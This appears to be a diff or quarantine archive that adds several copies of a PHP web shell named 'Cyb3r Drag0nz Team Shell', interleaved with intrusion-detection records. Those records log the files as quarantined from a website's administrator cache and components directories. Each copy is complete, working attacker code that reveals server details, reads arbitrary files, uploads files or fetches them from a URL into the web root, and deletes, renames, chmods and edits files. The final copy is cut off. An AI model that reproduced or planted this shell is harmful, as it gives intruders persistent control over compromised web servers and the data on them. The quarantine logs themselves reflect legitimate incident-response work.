<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
15
var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5115",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/cache/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353221,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/cache/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5117",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/components/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353222,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/components/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
